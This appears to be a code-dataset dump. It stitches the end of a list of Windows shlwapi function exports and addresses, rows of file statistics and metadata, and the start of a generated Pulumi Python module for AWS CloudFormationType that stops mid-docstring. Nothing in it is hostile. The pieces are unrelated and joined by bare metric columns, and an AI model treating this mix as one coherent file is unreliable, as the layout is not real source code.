'SHRegGetUSValueA', 'address': '0x7ffb3e20f310'}, {'type': 'function', 'name': 'SHRegGetUSValueW', 'address': '0x7ffb3e20f330'}, {'type': 'function', 'name': 'SHRegGetValueA', 'address': '0x7ffb3e212580'}, {'type': 'function', 'name': 'SHRegGetValueFromHKCUHKLM', 'address': '0x7ffb3e20b060'}, {'type': 'function', 'name': 'SHRegGetValueW', 'address': '0x7ffb3e207fd0'}, {'type': 'function', 'name': 'SHRegOpenUSKeyA', 'address': '0x7ffb3e20f350'}, {'type': 'function', 'name': 'SHRegOpenUSKeyW', 'address': '0x7ffb3e20f370'}, {'type': 'function', 'name': 'SHRegQueryInfoUSKeyA', 'address': '0x7ffb3e20f390'}, {'type': 'function', 'name': 'SHRegQueryInfoUSKeyW', 'address': '0x7ffb3e20f3b0'}, {'type': 'function', 'name': 'SHRegQueryUSValueA', 'address': '0x7ffb3e20f3d0'}, {'type': 'function', 'name': 'SHRegQueryUSValueW', 'address': '0x7ffb3e20f3f0'}, {'type': 'function', 'name': 'SHRegSetPathA', 'address': '0x7ffb3e2125a0'}, {'type': 'function', 'name': 'SHRegSetPathW', 'address': '0x7ffb3e2125c0'}, {'type': 'function', 'name': 'SHRegSetUSValueA', 'address': '0x7ffb3e20f410'}, {'type': 'function', 'name': 'SHRegSetUSValueW', 'address': '0x7ffb3e20f430'}, {'type': 'function', 'name': 'SHRegWriteUSValueA', 'address': '0x7ffb3e20f450'}, {'type': 'function', 'name': 'SHRegWriteUSValueW', 'address': '0x7ffb3e20f470'}, {'type': 'function', 'name': 'SHRegisterValidateTemplate', 'address': '0x7ffb3e22b260'}, {'type': 'function', 'name': 'SHReleaseThreadRef', 'address': '0x7ffb3e2125e0'}, {'type': 'function', 'name': 'SHRunIndirectRegClientCommand', 'address': '0x7ffb3e217570'}, {'type': 'function', 'name': 'SHSendMessageBroadcastA', 'address': '0x7ffb3e21d670'}, {'type': 'function', 'name': 'SHSendMessageBroadcastW', 'address': '0x7ffb3e21d6a0'}, {'type': 'function', 'name': 'SHSetThreadRef', 'address': '0x7ffb3e209eb0'}, {'type': 'function', 'name': 'SHSetValueA', 'address': '0x7ffb3e212600'}, {'type': 'function', 'name': 'SHSetValueW', 'address': '0x7ffb3e209da0'}, {'type': 'function', 'name': 'SHSkipJunction', 'address': '0x7ffb3e205ff0'}, {'type': 'function', 'name': 'SHStrDupA', 'address': '0x7ffb3e212620'}, {'type': 'function', 'name': 'SHStrDupW', 'address': '0x7ffb3e209e90'}, {'type': 'function', 'name': 'SHStripMneumonicA', 'address': '0x7ffb3e21d8e0'}, {'type': 'function', 'name': 'SHStripMneumonicW', 'address': '0x7ffb3e206a90'}, {'type': 'function', 'name': 'SHUnicodeToAnsi', 'address': '0x7ffb3e212640'}, {'type': 'function', 'name': 'SHUnicodeToUnicode', 'address': '0x7ffb3e212660'}, {'type': 'function', 'name': 'SHUnlockShared', 'address': '0x7ffb3e2206c0'}, {'type': 'function', 'name': 'ShellMessageBoxA', 'address': '0x7ffb3e214f80'}, {'type': 'function', 'name': 'ShellMessageBoxW', 'address': 
'0x7ffb3e219410'}, {'type': 'function', 'name': 'StrCSpnA', 'address': '0x7ffb3e20f4b0'}, {'type': 'function', 'name': 'StrCSpnIA', 'address': '0x7ffb3e20f4d0'}, {'type': 'function', 'name': 'StrCSpnIW', 'address': '0x7ffb3e20f4f0'}, {'type': 'function', 'name': 'StrCSpnW', 'address': '0x7ffb3e20f510'}, {'type': 'function', 'name': 'StrCatBuffA', 'address': '0x7ffb3e20f530'}, {'type': 'function', 'name': 'StrCatBuffW', 'address': '0x7ffb3e20f550'}, {'type': 'function', 'name': 'StrCatChainW', 'address': '0x7ffb3e20f570'}, {'type': 'function', 'name': 'StrCatW', 'address': '0x7ffb3e219880'}, {'type': 'function', 'name': 'StrChrA', 'address': '0x7ffb3e20f590'}, {'type': 'function', 'name': 'StrChrIA', 'address': '0x7ffb3e20f5b0'}, {'type': 'function', 'name': 'StrChrIW', 'address': '0x7ffb3e207fb0'}, {'type': 'function', 'name': 'StrChrNIW', 'address': '0x7ffb3e20f5d0'}, {'type': 'function', 'name': 'StrChrNW', 'address': '0x7ffb3e20f5f0'}, {'type': 'function', 'name': 'StrChrW', 'address': '0x7ffb3e2062a0'}, {'type': 'function', 'name': 'StrCmpCA', 'address': '0x7ffb3e20f610'}, {'type': 'function', 'name': 'StrCmpCW', 'address': '0x7ffb3e206fc0'}, {'type': 'function', 'name': 'StrCmpICA', 'address': '0x7ffb3e207870'}, {'type': 'function', 'name': 'StrCmpICW', 'address': '0x7ffb3e206e30'}, {'type': 'function', 'name': 'StrCmpIW', 'address': '0x7ffb3e2019b0'}, {'type': 'function', 'name': 'StrCmpLogicalW', 'address': '0x7ffb3e20f630'}, {'type': 'function', 'name': 'StrCmpNA', 'address': '0x7ffb3e20f650'}, {'type': 'function', 'name': 'StrCmpNCA', 'address': '0x7ffb3e20f670'}, {'type': 'function', 'name': 'StrCmpNCW', 'address': '0x7ffb3e20f690'}, {'type': 'function', 'name': 'StrCmpNIA', 'address': '0x7ffb3e20f6b0'}, {'type': 'function', 'name': 'StrCmpNICA', 'address': '0x7ffb3e20f6d0'}, {'type': 'function', 'name': 'StrCmpNICW', 'address': '0x7ffb3e208030'}, {'type': 'function', 'name': 'StrCmpNIW', 'address': '0x7ffb3e209570'}, {'type': 'function', 'name': 'StrCmpNW', 'address': '0x7ffb3e2066a0'}, {'type': 'function', 'name': 'StrCmpW', 'address': '0x7ffb3e205860'}, {'type': 'function', 'name': 'StrCpyNW', 'address': '0x7ffb3e20f6f0'}, {'type': 'function', 'name': 'StrCpyW', 'address': '0x7ffb3e2198c0'}, {'type': 'function', 'name': 'StrDupA', 'address': '0x7ffb3e20f750'}, {'type': 'function', 'name': 'StrDupW', 'address': '0x7ffb3e2070f0'}, {'type': 'function', 'name': 'StrFormatByteSize64A', 'address': '0x7ffb3e219990'}, {'type': 'function', 'name': 'StrFormatByteSizeA', 'address': '0x7ffb3e219a10'}, {'type': 'function', 'name': 'StrFormatByteSizeEx', 'address': '0x7ffb3e201870'}, {'type': 'function', 'name': 'StrFormatByteSizeW', 'address': '0x7ffb3e219a20'}, {'type': 'function', 'name': 'StrFormatKBSizeA', 'address': '0x7ffb3e219a40'}, {'type': 'function', 'name': 'StrFormatKBSizeW', 'address': '0x7ffb3e219ac0'}, {'type': 'function', 'name': 'StrFromTimeIntervalA', 'address': '0x7ffb3e219ef0'}, {'type': 'function', 'name': 'StrFromTimeIntervalW', 'address': '0x7ffb3e219f80'}, {'type': 'function', 'name': 'StrIsIntlEqualA', 'address': '0x7ffb3e20f770'}, {'type': 'function', 'name': 'StrIsIntlEqualW', 'address': '0x7ffb3e20f790'}, {'type': 'function', 'name': 'StrNCatA', 'address': '0x7ffb3e2198f0'}, {'type': 'function', 'name': 'StrNCatW', 'address': '0x7ffb3e219940'}, {'type': 'function', 'name': 'StrPBrkA', 'address': '0x7ffb3e20f7b0'}, {'type': 'function', 'name': 'StrPBrkW', 'address': '0x7ffb3e209700'}, {'type': 'function', 'name': 'StrRChrA', 'address': '0x7ffb3e20f7d0'}, {'type': 
'function', 'name': 'StrRChrIA', 'address': '0x7ffb3e20f7f0'}, {'type': 'function', 'name': 'StrRChrIW', 'address': '0x7ffb3e2090c0'}, {'type': 'function', 'name': 'StrRChrW', 'address': '0x7ffb3e209370'}, {'type': 'function', 'name': 'StrRStrIA', 'address': '0x7ffb3e20f810'}, {'type': 'function', 'name': 'StrRStrIW', 'address': '0x7ffb3e20f830'}, {'type': 'function', 'name': 'StrRetToBSTR', 'address': '0x7ffb3e219ae0'}, {'type': 'function', 'name': 'StrRetToBufA', 'address': '0x7ffb3e219b00'}, {'type': 'function', 'name': 'StrRetToBufW', 'address': '0x7ffb3e207f60'}, {'type': 'function', 'name': 'StrRetToStrA', 'address': '0x7ffb3e219bc0'}, {'type': 'function', 'name': 'StrRetToStrW', 'address': '0x7ffb3e219c50'}, {'type': 'function', 'name': 'StrSpnA', 'address': '0x7ffb3e20f850'}, {'type': 'function', 'name': 'StrSpnW', 'address': '0x7ffb3e20f870'}, {'type': 'function', 'name': 'StrStrA', 'address': '0x7ffb3e20f890'}, {'type': 'function', 'name': 'StrStrIA', 'address': '0x7ffb3e20f8b0'}, {'type': 'function', 'name': 'StrStrIW', 'address': '0x7ffb3e206a50'}, {'type': 'function', 'name': 'StrStrNIW', 'address': '0x7ffb3e20f8d0'}, {'type': 'function', 'name': 'StrStrNW', 'address': '0x7ffb3e20f8f0'}, {'type': 'function', 'name': 'StrStrW', 'address': '0x7ffb3e20f910'}, {'type': 'function', 'name': 'StrToInt64ExA', 'address': '0x7ffb3e20f930'}, {'type': 'function', 'name': 'StrToInt64ExW', 'address': '0x7ffb3e20f950'}, {'type': 'function', 'name': 'StrToIntA', 'address': '0x7ffb3e20f970'}, {'type': 'function', 'name': 'StrToIntExA', 'address': '0x7ffb3e20f990'}, {'type': 'function', 'name': 'StrToIntExW', 'address': '0x7ffb3e2096e0'}, {'type': 'function', 'name': 'StrToIntW', 'address': '0x7ffb3e206280'}, {'type': 'function', 'name': 'StrTrimA', 'address': '0x7ffb3e20f9b0'}, {'type': 'function', 'name': 'StrTrimW', 'address': '0x7ffb3e2099b0'}, {'type': 'function', 'name': 'UrlApplySchemeA', 'address': '0x7ffb3e20f9d0'}, {'type': 'function', 'name': 'UrlApplySchemeW', 'address': '0x7ffb3e20f9f0'}, {'type': 'function', 'name': 'UrlCanonicalizeA', 'address': '0x7ffb3e20fa10'}, {'type': 'function', 'name': 'UrlCanonicalizeW', 'address': '0x7ffb3e207600'}, {'type': 'function', 'name': 'UrlCombineA', 'address': '0x7ffb3e20fa30'}, {'type': 'function', 'name': 'UrlCombineW', 'address': '0x7ffb3e207a60'}, {'type': 'function', 'name': 'UrlCompareA', 'address': '0x7ffb3e20fa50'}, {'type': 'function', 'name': 'UrlCompareW', 'address': '0x7ffb3e20fa70'}, {'type': 'function', 'name': 'UrlCreateFromPathA', 'address': '0x7ffb3e20fa90'}, {'type': 'function', 'name': 'UrlCreateFromPathW', 'address': '0x7ffb3e20fab0'}, {'type': 'function', 'name': 'UrlEscapeA', 'address': '0x7ffb3e20fad0'}, {'type': 'function', 'name': 'UrlEscapeW', 'address': '0x7ffb3e207970'}, {'type': 'function', 'name': 'UrlFixupW', 'address': '0x7ffb3e20faf0'}, {'type': 'function', 'name': 'UrlGetLocationA', 'address': '0x7ffb3e20fb10'}, {'type': 'function', 'name': 'UrlGetLocationW', 'address': '0x7ffb3e20fb30'}, {'type': 'function', 'name': 'UrlGetPartA', 'address': '0x7ffb3e20fb50'}, {'type': 'function', 'name': 'UrlGetPartW', 'address': '0x7ffb3e206a70'}, {'type': 'function', 'name': 'UrlHashA', 'address': '0x7ffb3e20fb70'}, {'type': 'function', 'name': 'UrlHashW', 'address': '0x7ffb3e20fb90'}, {'type': 'function', 'name': 'UrlIsA', 'address': '0x7ffb3e20fbb0'}, {'type': 'function', 'name': 'UrlIsNoHistoryA', 'address': '0x7ffb3e20fbd0'}, {'type': 'function', 'name': 'UrlIsNoHistoryW', 'address': '0x7ffb3e208130'}, {'type': 
'function', 'name': 'UrlIsOpaqueA', 'address': '0x7ffb3e20fbf0'}, {'type': 'function', 'name': 'UrlIsOpaqueW', 'address': '0x7ffb3e20fc10'}, {'type': 'function', 'name': 'UrlIsW', 'address': '0x7ffb3e206c30'}, {'type': 'function', 'name': 'UrlUnescapeA', 'address': '0x7ffb3e20fc30'}, {'type': 'function', 'name': 'UrlUnescapeW', 'address': '0x7ffb3e207280'}, {'type': 'function', 'name': 'WhichPlatform', 'address': '0x7ffb3e21da20'}, {'type': 'function', 'name': 'wnsprintfA', 'address': '0x7ffb3e21a900'}, {'type': 'function', 'name': 'wnsprintfW', 'address': '0x7ffb3e21a950'}, {'type': 'function', 'name': 'wvnsprintfA', 'address': '0x7ffb3e21a9b0'}, {'type': 'function', 'name': 'wvnsprintfW', 'address': '0x7ffb3e21a9f0'}]
| 14,561.5
| 29,110
| 0.665797
| 2,265
| 29,123
| 8.552318
| 0.333333
| 0.231687
| 0.308915
| 0.010686
| 0.00764
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108874
| 0.07719
| 29,123
| 2
| 29,110
| 14,561.5
| 0.611907
| 0
| 0
| 0
| 0
| 0
| 0.665293
| 0.031314
| 0
| 0
| 0.179783
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
6ad96ee0742eb74d9fad999e7d37a0127ae1d073
| 36,072
|
py
|
Python
|
sdk/python/pulumi_aws/cloudformation/cloud_formation_type.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudformation/cloud_formation_type.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/cloudformation/cloud_formation_type.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['CloudFormationTypeArgs', 'CloudFormationType']
@pulumi.input_type
class CloudFormationTypeArgs:
def __init__(__self__, *,
schema_handler_package: pulumi.Input[str],
type_name: pulumi.Input[str],
execution_role_arn: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CloudFormationType resource.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input['CloudFormationTypeLoggingConfigArgs'] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
pulumi.set(__self__, "schema_handler_package", schema_handler_package)
pulumi.set(__self__, "type_name", type_name)
if execution_role_arn is not None:
pulumi.set(__self__, "execution_role_arn", execution_role_arn)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="schemaHandlerPackage")
def schema_handler_package(self) -> pulumi.Input[str]:
"""
URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
"""
return pulumi.get(self, "schema_handler_package")
@schema_handler_package.setter
def schema_handler_package(self, value: pulumi.Input[str]):
pulumi.set(self, "schema_handler_package", value)
@property
@pulumi.getter(name="typeName")
def type_name(self) -> pulumi.Input[str]:
"""
CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
return pulumi.get(self, "type_name")
@type_name.setter
def type_name(self, value: pulumi.Input[str]):
pulumi.set(self, "type_name", value)
@property
@pulumi.getter(name="executionRoleArn")
def execution_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
"""
return pulumi.get(self, "execution_role_arn")
@execution_role_arn.setter
def execution_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execution_role_arn", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]:
"""
Configuration block containing logging configuration.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
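# A minimal sketch of constructing the args class above directly (kept as a
# comment so this generated module stays import-safe); the S3 URL is a
# hypothetical placeholder, not a value from this repository:
#
#   args = CloudFormationTypeArgs(
#       schema_handler_package="s3://example-bucket/example-object",
#       type_name="ExampleCompany::ExampleService::ExampleResource",
#       type="RESOURCE")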
@pulumi.input_type
class _CloudFormationTypeState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
default_version_id: Optional[pulumi.Input[str]] = None,
deprecated_status: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
documentation_url: Optional[pulumi.Input[str]] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
is_default_version: Optional[pulumi.Input[bool]] = None,
logging_config: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']] = None,
provisioning_type: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
source_url: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_arn: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CloudFormationType resources.
:param pulumi.Input[str] arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
:param pulumi.Input[str] default_version_id: Identifier of the CloudFormation Type default version.
:param pulumi.Input[str] deprecated_status: Deprecation status of the version.
:param pulumi.Input[str] description: Description of the version.
:param pulumi.Input[str] documentation_url: URL of the documentation for the CloudFormation Type.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input[bool] is_default_version: Whether the CloudFormation Type version is the default version.
:param pulumi.Input['CloudFormationTypeLoggingConfigArgs'] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] provisioning_type: Provisioning behavior of the CloudFormation Type.
:param pulumi.Input[str] schema: JSON document of the CloudFormation Type schema.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] source_url: URL of the source code for the CloudFormation Type.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
:param pulumi.Input[str] type_arn: (Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
:param pulumi.Input[str] version_id: (Optional) Identifier of the CloudFormation Type version.
:param pulumi.Input[str] visibility: Scope of the CloudFormation Type.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if default_version_id is not None:
pulumi.set(__self__, "default_version_id", default_version_id)
if deprecated_status is not None:
pulumi.set(__self__, "deprecated_status", deprecated_status)
if description is not None:
pulumi.set(__self__, "description", description)
if documentation_url is not None:
pulumi.set(__self__, "documentation_url", documentation_url)
if execution_role_arn is not None:
pulumi.set(__self__, "execution_role_arn", execution_role_arn)
if is_default_version is not None:
pulumi.set(__self__, "is_default_version", is_default_version)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if provisioning_type is not None:
pulumi.set(__self__, "provisioning_type", provisioning_type)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if schema_handler_package is not None:
pulumi.set(__self__, "schema_handler_package", schema_handler_package)
if source_url is not None:
pulumi.set(__self__, "source_url", source_url)
if type is not None:
pulumi.set(__self__, "type", type)
if type_arn is not None:
pulumi.set(__self__, "type_arn", type_arn)
if type_name is not None:
pulumi.set(__self__, "type_name", type_name)
if version_id is not None:
pulumi.set(__self__, "version_id", version_id)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type version. See also `type_arn`.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="defaultVersionId")
def default_version_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier of the CloudFormation Type default version.
"""
return pulumi.get(self, "default_version_id")
@default_version_id.setter
def default_version_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_version_id", value)
@property
@pulumi.getter(name="deprecatedStatus")
def deprecated_status(self) -> Optional[pulumi.Input[str]]:
"""
Deprecation status of the version.
"""
return pulumi.get(self, "deprecated_status")
@deprecated_status.setter
def deprecated_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deprecated_status", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the version.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="documentationUrl")
def documentation_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the documentation for the CloudFormation Type.
"""
return pulumi.get(self, "documentation_url")
@documentation_url.setter
def documentation_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "documentation_url", value)
@property
@pulumi.getter(name="executionRoleArn")
def execution_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
"""
return pulumi.get(self, "execution_role_arn")
@execution_role_arn.setter
def execution_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execution_role_arn", value)
@property
@pulumi.getter(name="isDefaultVersion")
def is_default_version(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the CloudFormation Type version is the default version.
"""
return pulumi.get(self, "is_default_version")
@is_default_version.setter
def is_default_version(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_default_version", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]:
"""
Configuration block containing logging configuration.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['CloudFormationTypeLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter(name="provisioningType")
def provisioning_type(self) -> Optional[pulumi.Input[str]]:
"""
Provisioning behavior of the CloudFormation Type.
"""
return pulumi.get(self, "provisioning_type")
@provisioning_type.setter
def provisioning_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "provisioning_type", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
JSON document of the CloudFormation Type schema.
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter(name="schemaHandlerPackage")
def schema_handler_package(self) -> Optional[pulumi.Input[str]]:
"""
URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
"""
return pulumi.get(self, "schema_handler_package")
@schema_handler_package.setter
def schema_handler_package(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema_handler_package", value)
@property
@pulumi.getter(name="sourceUrl")
def source_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the source code for the CloudFormation Type.
"""
return pulumi.get(self, "source_url")
@source_url.setter
def source_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_url", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="typeArn")
def type_arn(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) Amazon Resource Name (ARN) of the CloudFormation Type. See also `arn`.
"""
return pulumi.get(self, "type_arn")
@type_arn.setter
def type_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type_arn", value)
@property
@pulumi.getter(name="typeName")
def type_name(self) -> Optional[pulumi.Input[str]]:
"""
CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
return pulumi.get(self, "type_name")
@type_name.setter
def type_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type_name", value)
@property
@pulumi.getter(name="versionId")
def version_id(self) -> Optional[pulumi.Input[str]]:
"""
(Optional) Identifier of the CloudFormation Type version.
"""
return pulumi.get(self, "version_id")
@version_id.setter
def version_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version_id", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
"""
Scope of the CloudFormation Type.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
class CloudFormationType(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
execution_role_arn: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']]] = None,
schema_handler_package: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
type_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudformation.CloudFormationType("example",
schema_handler_package=f"s3://{aws_s3_bucket_object['example']['bucket']}/{aws_s3_bucket_object['example']['key']}",
type="RESOURCE",
type_name="ExampleCompany::ExampleService::ExampleResource",
logging_config=aws.cloudformation.CloudFormationTypeLoggingConfigArgs(
log_group_name=aws_cloudwatch_log_group["example"]["name"],
log_role_arn=aws_iam_role["example"]["arn"],
))
```
## Import
        `aws_cloudformation_type` can be imported using its type version Amazon Resource Name (ARN), e.g.,
```sh
$ pulumi import aws:cloudformation/cloudFormationType:CloudFormationType example arn:aws:cloudformation:us-east-1:123456789012:type/resource/ExampleCompany-ExampleService-ExampleType/1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] execution_role_arn: Amazon Resource Name (ARN) of the IAM Role for CloudFormation to assume when invoking the extension. If your extension calls AWS APIs in any of its handlers, you must create an IAM execution role that includes the necessary permissions to call those AWS APIs, and provision that execution role in your account. When CloudFormation needs to invoke the extension handler, CloudFormation assumes this execution role to create a temporary session token, which it then passes to the extension handler, thereby supplying your extension with the appropriate credentials.
:param pulumi.Input[pulumi.InputType['CloudFormationTypeLoggingConfigArgs']] logging_config: Configuration block containing logging configuration.
:param pulumi.Input[str] schema_handler_package: URL to the S3 bucket containing the extension project package that contains the necessary files for the extension you want to register. Must begin with `s3://` or `https://`. For example, `s3://example-bucket/example-object`.
:param pulumi.Input[str] type: CloudFormation Registry Type. For example, `RESOURCE` or `MODULE`.
:param pulumi.Input[str] type_name: CloudFormation Type name. For example, `ExampleCompany::ExampleService::ExampleResource`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CloudFormationTypeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.cloudformation.CloudFormationType("example",
schema_handler_package=f"s3://{aws_s3_bucket_object['example']['bucket']}/{aws_s3_bucket_object['example']['key']}",
type="RESOURCE",
type_name="ExampleCompany::ExampleService::ExampleResource",
logging_config=aws.cloudformation.CloudFormationTypeLoggingConfigArgs(
log_group_name=aws_cloudwatch_log_group["example"]["name"],
log_role_arn=aws_iam_role["example"]["arn"],
))
```
## Import
        `aws_cloudformation_type` can be imported using its type version Amazon Resource Name (ARN), e.g.,
```sh
